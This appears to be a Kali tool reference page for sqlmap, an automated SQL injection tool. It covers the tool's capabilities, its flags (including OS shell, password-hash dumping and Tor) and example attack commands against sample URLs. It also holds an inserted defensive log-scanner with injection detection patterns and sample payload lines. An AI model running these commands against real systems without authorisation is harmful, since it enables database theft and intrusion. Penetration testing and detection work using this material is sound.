
sqlmap

Automatic SQL injection tool that detects and exploits SQL injection vulnerabilities in web applications. It allows fingerprinting of the back-end DBMS, enumeration of databases, users, tables, and data dumping.

Description

sqlmap is designed to detect and take advantage of SQL injection vulnerabilities in web applications. Once it identifies SQL injections on the target host, users can perform extensive back-end database management system fingerprinting, retrieve DBMS session user and database information, enumerate users, password hashes, privileges, databases, and dump entire or specific DBMS tables and columns. It also supports running custom SQL statements, reading files on the file system, and gaining operating system access.

Use cases include automated testing for SQL injection flaws in web apps, extracting sensitive data from vulnerable databases, and demonstrating the impact of SQLi vulnerabilities. The tool emphasizes legal use with prior consent and includes a disclaimer about user responsibility for compliance with laws.

Additional components such as sqlmapapi provide a REST-JSON API server and client for integrating sqlmap capabilities programmatically.

How It Works

sqlmap tests target URLs for SQL injection by sending crafted payloads and analyzing responses for DBMS-specific behaviors across techniques like Boolean-based blind, Error-based, UNION query, Stacked queries, Time-based blind, and Out-of-band. It supports customizable detection levels (1-5) and risk levels (1-3), parameter selection, DBMS forcing, proxies, Tor, and random agents. Upon detection, it enumerates DBMS details, structures, and data using injection points, and can escalate to OS shells or file access via DBMS privileges.
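Seen from the defender's side, the technique families listed above leave recognisable traces in web server logs. The following is an added example, not code from sqlmap or from the original page: a heuristic scanner that tags logged requests with the technique letters used in "BEUSTQ" and reports sources that exercise several families. The regex signatures, the `min_families` threshold and the sample log lines are constructed assumptions (generic SQLi markers, not sqlmap's payload list); out-of-band (Q) is omitted because it is not reliably visible in the request line.

```python
import re
from urllib.parse import unquote_plus

# Assumed generic markers per technique family, keyed by the "BEUSTQ" letters.
SIGNATURES = {
    "B": re.compile(r"\b(and|or)\s+\(?\s*\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(|\bconvert\s*\(\s*int", re.I),
    "U": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "S": re.compile(r";\s*(select|insert|update|delete|drop|create|exec)\b", re.I),
    "T": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", re.I),
}

# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the technique letters whose marker appears in the decoded target."""
    decoded = unquote_plus(target)
    return "".join(k for k in "BEUST" if SIGNATURES[k].search(decoded))

def scan(lines, min_families=2):
    """Map each source IP to the families seen, keeping only multi-family sources."""
    seen = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        families = classify(target)
        if families:
            seen.setdefault(ip, set()).update(families)
    return {ip: "".join(sorted(f)) for ip, f in seen.items()
            if len(f) >= min_families}

# Constructed sample log (documentation IP ranges), including one benign
# search that contains the words "union" and "select".
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/2026:10:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Apr/2026:10:00:02 +0000] "GET /vuln.php?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Apr/2026:10:00:03 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 530',
    '203.0.113.7 - - [16/Apr/2026:10:00:09 +0000] "GET /vuln.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512',
    '198.51.100.20 - - [16/Apr/2026:10:01:00 +0000] "GET /search?q=union+station+select+seats HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, families in scan(SAMPLE_LOG).items():
        print(f"{ip}: technique families {families}")
```

Requiring more than one family per source cuts down on false positives from single odd-looking requests; POST bodies and cookies are not in the request line and need application-level logging to be covered.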

Installation

sudo apt install sqlmap

Flags

-u URL, --url=URL       Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK           Process Google dork results as target URLs
--data=DATA             Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE         HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent          Use randomly selected HTTP User-Agent header value
--proxy=PROXY           Use a proxy to connect to the target URL
--tor                   Use Tor anonymity network
--check-tor             Check to see if Tor is used properly
-p TESTPARAMETER        Testable parameter(s)
--dbms=DBMS             Force back-end DBMS to provided value
--level=LEVEL           Level of tests to perform (1-5, default 1)
--risk=RISK             Risk of tests to perform (1-3, default 1)
--technique=TECH..      SQL injection techniques to use (default "BEUSTQ")
-a, --all               Retrieve everything
-b, --banner            Retrieve DBMS banner
--current-user          Retrieve DBMS current user
--current-db            Retrieve DBMS current database
--passwords             Enumerate DBMS users password hashes
--dbs                   Enumerate DBMS databases
--tables                Enumerate DBMS database tables
--columns               Enumerate DBMS database table columns
--os-shell              Prompt for an interactive operating system shell
--os-pwn                Prompt for an OOB shell, Meterpreter or VNC
--batch                 Never ask for user input, use the default behavior
--flush-session         Flush session files for current target
--wizard                Simple wizard interface for beginner users

Examples

Attack the given URL and extract the database names:
sqlmap -u "http://192.168.1.250/?p=1&forumaction=search" --dbs

Show basic help message and exit:
sqlmap -h

Show advanced help message and exit:
sqlmap -hh

Show program's version number and exit:
sqlmap --version

Target a specific URL for SQL injection testing:
sqlmap -u "http://www.site.com/vuln.php?id=1"

Send POST data for injection testing:
sqlmap -u "http://www.site.com/vuln.php?id=1" --data="id=1"

Use specified HTTP Cookie for authenticated testing:
sqlmap -u "http://www.site.com/vuln.php?id=1" --cookie="PHPSESSID=a8d127e.."

Use Tor for anonymous connection to target:
sqlmap -u "http://www.site.com/vuln.php?id=1" --tor
Updated 2026-04-16. Source: kali.org